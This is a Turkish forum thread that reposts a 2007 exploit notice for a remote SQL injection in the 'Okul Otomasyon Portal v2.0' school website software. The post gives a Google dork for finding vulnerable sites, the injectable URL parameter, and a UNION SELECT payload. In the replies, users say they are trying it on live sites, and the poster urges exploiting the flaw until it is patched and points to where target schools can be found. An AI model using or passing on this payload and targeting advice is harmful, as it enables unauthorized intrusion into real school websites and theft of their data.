Okul Otomasyon V2.0

byskandal

New member
Kod:
###############################  Dumenci v19.1   ###################################
####                       Okul Otomasyon Portal v2.0                            ####
####                          remote sql injection                               ####
#####################################################################################
#                                                                                   #
#AUTHOR : Okulumun sitesi                                                           #
#Script Download : http://www.okulumunsitesi.com/                                   #
#DORK: "inurl:/k12.tr/?part="                                                       #
#                                                                                   #
# Injection Adress : http://site.com/default.asp?islem=1&id=[sql code]              #
# my COD : -1+union+select+0,1,id,baslik,4,5,6+from+haber                           #
#                                MEFISTO,KınSıze,CyberGhost                      #tr#
#####################################################################################

# milw0rm.com [2007-10-16]
Kolay Gelsin

sbrsrn

New member
pardon ama bu nerede ve nasıl kullanılır?bunun için ayrı bir program mı var okulun sitesini neden yazıyorum nereye yazıyorum ben bu konuda hiçbirşey bilmiyorum sallamaya bilirsin anlayışla karşılarım

Ŧ ℓ ε ŧ ¢ ħ

ےσℓđ
remote sql injection diyince durmak lazım
çünkü en sevdiğimden :D (niye? niye olucak en basiti de ondan)

sql code dan eminsin değil mi?
çünkü henüz çalıştıramadım.en iyisi birkaç sitede daha deniyim

byskandal

New member
pardon ama bu nerede ve nasıl kullanılır?bunun için ayrı bir program mı var okulun sitesini neden yazıyorum nereye yazıyorum ben bu konuda hiçbirşey bilmiyorum sallamaya bilirsin anlayışla karşılarım
Kardeş açık değil mi sence yazılan .

Okul programının v 2.0 açık var mış kapatılısaya kadar kullanınn yeteri kadar açıklama yapmaya gerek yok.

yukarda verilen orjinal siteden giriş yap ve son 10 kullanan okul blocktan görebilirsin...Google aratmana gerek yok ;)

Kolay gele